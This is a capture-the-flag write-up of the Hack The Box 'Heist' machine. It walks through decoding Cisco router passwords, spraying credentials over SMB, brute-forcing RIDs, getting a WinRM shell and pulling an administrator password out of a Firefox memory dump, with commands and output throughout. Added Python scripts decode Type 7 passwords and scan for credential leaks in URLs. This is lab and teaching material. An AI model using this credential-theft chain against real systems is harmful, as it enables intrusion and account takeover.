Preface

This is a writeup for the Heist machine from Hack The Box.

Information Gathering

Scan the ports with nmap

$ nmap -p- -sV -sC -sS 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-11 09:53 EST
Nmap scan report for 10.10.10.149
Host is up (0.19s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 38s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-12-11T15:58:12
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3906.87 seconds

Port 80: web service, 445: SMB, 5985: WinRM, 135/49668: RPC

Web

The host runs a web service; opening it shows a login page. The page has a guest-access feature, where you can see a configuration file someone uploaded:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh

Several accounts and passwords can be taken from the config file:

Account  Password                            Encryption type
???      $1$pdQG$o8nrSzsGXeaduXrjlvKc91      Type 5
rout3r   0242114B0E143F015F5D1E161713        Type 7
admin    02375012182C1A1D751618034F36415408  Type 7

Together with the description on the page, this is a Cisco router configuration file, but clearly all of the passwords above are stored in encrypted form. Looking it up, Type 7 can be decoded directly, whereas Type 5 is not that easy and can only be brute-forced.

For Type 7 I used an online decoder directly (that site can also crack Type 5, but it takes a long time), which gave two passwords: $uperP@ssword and Q4)sJu\Y8qz*A3?d
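As an added example (not from the original post), the following Python script shows why Type 7 offers no real protection: it is a fixed-key XOR that anyone can reverse, while the Type 5 enable secret is a salted md5crypt hash that can only be guessed offline. The config excerpt is taken from the lines above; the function names are my own.

```python
import re

# Cisco's fixed Type 7 XOR key; it has been public for decades, so
# "service password-encryption" is obfuscation rather than encryption.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(enc: str) -> str:
    """Reverse a 'password 7' string: a 2-digit seed, then hex bytes XORed with XLAT."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit() \
            or not re.fullmatch(r"[0-9A-Fa-f]+", enc[2:]):
        raise ValueError("malformed Type 7 string")
    seed = int(enc[:2])
    body = bytes.fromhex(enc[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(body)).decode("latin-1")

def audit_cisco_config(config: str) -> list:
    """Return (account, scheme, recovered_password_or_hash) for each credential line."""
    findings = []
    for line in config.splitlines():
        m = re.match(r"username (\S+)(?: privilege \d+)? password (\d) (\S+)", line)
        if m:
            account, ptype, value = m.groups()
        elif (m := re.match(r"enable secret (\d) (\S+)", line)):
            account, (ptype, value) = "<enable>", m.groups()
        else:
            continue
        if ptype == "7":
            findings.append((account, "Type 7: reversible, recovered", decode_type7(value)))
        elif ptype == "5":
            findings.append((account, "Type 5: md5crypt hash, offline guessing only", value))
        else:
            findings.append((account, f"Type {ptype}: not handled here", value))
    return findings

# The credential lines from the config file shown above (constructed excerpt).
SAMPLE_CONFIG = """\
hostname ios-1
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for account, scheme, value in audit_cisco_config(SAMPLE_CONFIG):
        print(f"{account:10} {scheme:45} {value}")
```

Modern IOS supports Type 8/9 (PBKDF2/scrypt) secrets; a config review should flag every remaining Type 7 line.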

For Type 5 I just used john (related article) to crack it.

➜  heist  cat hash.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
➜ heist john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
➜ heist john hash.txt --show
?:stealth1agent

This gives one password: stealth1agent. The matching username is unknown, though; the articles online all guess it is Hazard, the person who uploaded the attachment.

Get Shell

I know the server has SMB (port 445) and WinRM (port 5985) open, and both allow remote connections.

Try an anonymous SMB login

root@kali ~/Code/htb/heist # smbmap -H 10.10.10.149
[+] Finding open SMB ports....
root@kali ~/Code/htb/heist # smbclient -N -L 10.10.10.149
session setup failed: NT_STATUS_ACCESS_DENIED

No access. So the only option is to try the credentials just recovered. Use CrackMapExec to brute-force them (it stops at the first success; use --continue-on-success to keep going):

heist # crackmapexec smb 10.10.10.149 -u users -p passwords
CME 10.10.10.149:445 SUPPORTDESK [*] Windows 10.0 Build 17763 (name:SUPPORTDESK) (domain:SUPPORTDESK)
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent

This gives a valid credential pair: hazard/stealth1agent

But the same attempt against WinRM fails, which means this account is not allowed to log in over WinRM; there must be other credentials.

heist # crackmapexec winrm -u users -p passwords
[*] KTHXBYE!

Use smbmap to log in with the credentials just obtained

heist # smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.149...
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-378-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1e8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-448-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5ec-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-a10-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-288-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-278-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ROUTER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 gecko-crash-server-pipe.5428
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.0.190032358
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.1.96034004
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.2.10178136
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.3.201281206
.............(many chrome entries omitted)
IPC$ READ ONLY Remote IPC

The permissions are very limited, but IPC$ is readable. IPC$ (see the documentation) is implemented over RPC, and according to the documentation it can be used to list all shares, users and so on. Without further ado, connect over RPC right away.

heist # rpcclient -U 'hazard%stealth1agent' 10.10.10.149
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)

Each user has a SID. A SID is made up of several parts, and for SIDs on the same machine only the last part differs between users. That part is called the RID and identifies the individual user (in the output above you can see that the two accounts' SIDs differ only at the end). rpcclient can look up a username from a SID, so you could write a script that iterates over RIDs to enumerate accounts. Of course, there are tools for that too: use CrackMapExec again, this time with --rid-brute

(CrackMapExec) CrackMapExec[master] # cme smb 10.10.10.149 -u hazard -p stealth1agent --rid-brute
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent
SMB 10.10.10.149 445 SUPPORTDESK [+] Brute forcing RIDs
SMB 10.10.10.149 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.10.10.149 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)

This gives three new users: support, Chase and Jason. Trying the logins again yields a valid pair: chase / Q4)sJu\Y8qz*A3?d

Now try logging in to WinRM with this account, using evil-winrm to get a shell.

# evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127d***********

Privilege Escalation

Poking around the server, all signs point to Firefox, and there is a firefox process running as well.

*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop> cd ..\appdata\roaming
*Evil-WinRM* PS C:\Users\Chase\appdata\roaming> ls


Directory: C:\Users\Chase\appdata\roaming


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/22/2019 7:14 AM Adobe
d---s- 4/22/2019 7:14 AM Microsoft
d----- 4/22/2019 8:01 AM Mozilla


*Evil-WinRM* PS C:\Users\Chase\appdata\roaming> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
458 18 2308 5504 408 0 csrss
296 17 2400 5292 492 1 csrss
358 15 3592 14644 5232 1 ctfmon
166 9 1896 9808 0.03 3308 1 dllhost
257 14 4120 13536 3928 0 dllhost
616 35 34804 60416 1012 1 dwm
1496 58 23944 78636 5620 1 explorer
1137 71 139216 178680 40.83 432 1 firefox
408 32 17008 62692 2.92 516 1 firefox
343 19 9976 37424 0.13 1700 1 firefox
390 33 54340 86268 104.78 4860 1 firefox
*********(omitted)

We know the web service on port 80 requires a login; maybe the password is sitting in Firefox's memory.

Upload the procdump tool to the Windows host and dump the firefox process

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload procdump.exe 06.exe
[*] uploading : procdump.exe -> 06.exe
[*] Uploaded 467.19 KiB of 467.19 KiB (100.0%): procdump.exe -> 06.exe
[*] uploaded : procdump.exe -> 06.exe

*Evil-WinRM* PS C:\Users\Chase\Desktop>.\06.exe -ma 516 -accepteula

ProcDump v6.00 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

Writing dump file C:\Users\Chase\Desktop\firefox_191106_223459.dmp ...
Writing 293MB. Estimated time (less than) 9 seconds.
Dump written.

meterpreter > download firefox_191106_223459.dmp ./
[*] Downloading: firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 1.00 MiB of 286.62 MiB (0.35%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 2.00 MiB of 286.62 MiB (0.7%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 3.00 MiB of 286.62 MiB (1.05%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 4.00 MiB of 286.62 MiB (1.4%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 5.00 MiB of 286.62 MiB (1.74%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp

After downloading it locally, search for the password; just grep for the login password field of the port-80 login form:

kali at ~ ❯ strings firefox.exe_191214_145906.dmp | grep login_password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
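The password turned up in the dump because the login form submits its fields with GET, so the full URL (password included) is copied into Firefox's command line and the MOZ_CRASHREPORTER_RESTART_ARG_1 environment variable. As an added example (not from the original post), here is a small Python scanner that flags such URLs in command-line or strings output and redacts the sensitive values; the sample lines and the EXAMPLE-SECRET value are constructed.

```python
import re

# Query-string keys that should never appear in a URL (and therefore in a
# process command line, crash-reporter environment, proxy log or memory dump).
SENSITIVE_KEYS = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key", re.I)
# Rough URL matcher: optional scheme, host[:port], path, then a query string.
URL_RE = re.compile(r"""(?:https?://)?[\w.-]+(?::\d+)?/[^\s"']*\?[^\s"']+""")

def redact_url(url: str):
    """Return (redacted_url, leaked_keys); values of sensitive keys become <REDACTED>."""
    base, _, query = url.partition("?")
    leaked, kept = [], []
    for pair in query.split("&"):
        key, sep, value = pair.partition("=")
        if sep and SENSITIVE_KEYS.search(key):
            leaked.append(key)
            value = "<REDACTED>"
        kept.append(key + sep + value)
    return base + "?" + "&".join(kept), leaked

def scan_for_leaks(lines):
    """Report every line (1-based) whose URL carries a sensitive query parameter."""
    findings = []
    for num, line in enumerate(lines, start=1):
        for url in URL_RE.findall(line):
            redacted, leaked = redact_url(url)
            if leaked:
                findings.append({"line": num, "keys": leaked, "redacted": redacted})
    return findings

# Constructed sample modelled on the strings output above (password replaced).
SAMPLE_LINES = [
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?'
    r'login_username=admin@support.htb&login_password=EXAMPLE-SECRET&login=',
    'MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?'
    'login_username=admin@support.htb&login_password=EXAMPLE-SECRET&login=',
    'http://support.htb/issues.php?page=2',          # harmless query string
    r'C:\Windows\System32\svchost.exe -k netsvcs',    # no URL at all
]

if __name__ == "__main__":
    for f in scan_for_leaks(SAMPLE_LINES):
        print(f"line {f['line']}: leaked {f['keys']} -> {f['redacted']}")
```

The fix on the application side is to submit login forms with POST, so credentials never become part of a URL that other processes, logs and crash handlers copy around.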

Then just log in and it's done

kali at ~ ❯ evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:05 AM 32 root.txt